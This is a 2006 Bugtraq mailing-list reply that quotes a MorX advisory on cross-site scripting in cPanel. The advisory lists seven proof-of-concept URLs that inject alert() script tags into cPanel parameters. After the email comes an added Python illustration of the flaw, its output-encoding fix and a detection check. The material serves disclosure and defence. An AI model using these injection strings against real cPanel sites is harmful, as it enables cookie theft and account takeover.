Message-ID: <BAY112-F295E0D69AA422396D27C69DE0C0@phx.gbl>
Date: Sat, 04 Feb 2006 09:23:02 +0000
From: "Hamish Stanaway" <koremeltdown@...mail.com>
To: simo@...x.org, bugtraq@...urityfocus.com
Subject: RE: cPanel Multiple Cross Site Scripting Vulnerability
Hi there,
Thank you for finding this vulnerability in widely used software. I was
wondering if you had a solution or a workaround to this issue?
Kindest of regards,
Hamish Stanaway, CEO
Absolute Web Hosting / -= KoRe WoRkS =- Internet Security
Auckland, New Zealand
http://www.webhosting.net.nz
http://www.buywebhosting.co.nz
http://www.koreworks.com
>From: simo@...x.org
>To: bugtraq@...urityfocus.com
>Subject: cPanel Multiple Cross Site Scripting Vulnerability
>Date: Fri, 3 Feb 2006 04:31:49 -0000 (GMT)
>
>Title: cPanel Multiple Cross Site Scripting
>
>Author: Simo Ben youssef aka _6mO_HaCk <simo_at_morx_org>
>Discovered: 22 January 2005
>Published: 02 February 2006
>MorX Security Research Team
>http://www.morx.org
>
>Service: Web Hosting Manager
>
>Vendor: cPanel
>
>Vulnerability: Cross Site Scripting / Cookie-Theft / Relogin attacks
>
>Severity: Medium/High
>
>Details:
>
>cPanel (control panel) is a graphical web-based management tool, designed
>to make administration of web sites as easy as possible. cPanel handles
>all aspects of website administration in an easy-to-use interface.
>The software, which is proprietary, runs on a number of popular RPM-based
>Linux distributions, such as SuSE, Fedora, Mandriva, CentOS, Red Hat
>Enterprise Linux, and cAos, as well as FreeBSD. cPanel is commonly
>accessed on ports 2082 and 2083 (for an SSL version). Authentication is
>either via HTTP or web page login. cPanel is prone to cross-site scripting
>attacks. This problem is due to a failure in the application to properly
>sanitize user-supplied input.
>
>Impact:
>
>An attacker can exploit the vulnerable scripts to have arbitrary script
>code executed in the browser of an authenticated cPanel user in the context
>of the website hosting the vulnerable cPanel version, resulting in the
>theft of cookie-based authentication, giving the attacker full access to
>the victim's cPanel account as well as other types of attacks.
>
>Affected scripts with proof of concept exploit:
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=<script>alert('vul')</script>&domain=
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=<script>alert('vul')</script>&domain=xxx
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0"><script>alert('vul')</script>
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target="><script>alert('vul')</script>
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx"><script>alert('vul')</script>&target=xxx
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006"><script>alert('vul')</script>&domain=xxx&target=xxx
>
>http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan"><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx
>
>Disclaimer:
>
>This entire document is for educational, testing and demonstrating purposes
>only. Modification, use and/or publishing of this information is entirely at
>your OWN risk. The information provided in this advisory is to be
>used/tested on your OWN machine/account. I cannot be held responsible for
>any of the above.
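The advisory's proof-of-concept URLs show two reflection contexts: the `email` parameter lands in page text, while the `showtree` and `detailbw` parameters are injected with a leading `"` because they land inside an attribute value. The following is an added illustration of that pattern and its fix, not cPanel's code (which is proprietary); `render_unsafe`, `render_safe` and `reflects_script` are constructed stand-ins, and the two request URLs are built to the shape of the advisory's examples with a placeholder host.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed requests shaped like the advisory's proof-of-concept URLs
# (placeholder host, harmless alert() payload); not captured traffic.
POC_TEXT_CONTEXT = ("http://www.vulnerable-site.com:2082/frontend/xcontroller/"
                    "editquota.html?email=<script>alert('vul')</script>&domain=")
POC_ATTR_CONTEXT = ("http://www.vulnerable-site.com:2082/frontend/xcontroller/"
                    "diskusage.html?showtree=0\"><script>alert('vul')</script>")


def query_params(url):
    """Return the first value of each query parameter (blank values kept)."""
    raw = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in raw.items()}


def render_unsafe(url):
    """Stand-in for the failure the advisory describes: parameters are
    copied straight into the page, once as text and once into an attribute."""
    p = query_params(url)
    return (f"<p>Editing quota for {p.get('email', '')}</p>\n"
            f"<input type=\"hidden\" name=\"showtree\" "
            f"value=\"{p.get('showtree', '')}\">")


def render_safe(url):
    """Same page with HTML entity encoding. quote=True also encodes the
    double quote, which is what keeps a showtree=0\"><script> value inside
    the attribute instead of letting it close the attribute."""
    p = query_params(url)
    enc = lambda s: html.escape(s, quote=True)
    return (f"<p>Editing quota for {enc(p.get('email', ''))}</p>\n"
            f"<input type=\"hidden\" name=\"showtree\" "
            f"value=\"{enc(p.get('showtree', ''))}\">")


def reflects_script(fragment):
    """Defender's check: does a raw <script> tag survive into the output?"""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    for url in (POC_TEXT_CONTEXT, POC_ATTR_CONTEXT):
        print("unsafe reflects script:", reflects_script(render_unsafe(url)))
        print("safe   reflects script:", reflects_script(render_safe(url)))
```

Output encoding at the point of reflection is the actual fix; marking the session cookie HttpOnly narrows the cookie-theft impact the advisory lists but does not remove the cross-site scripting itself.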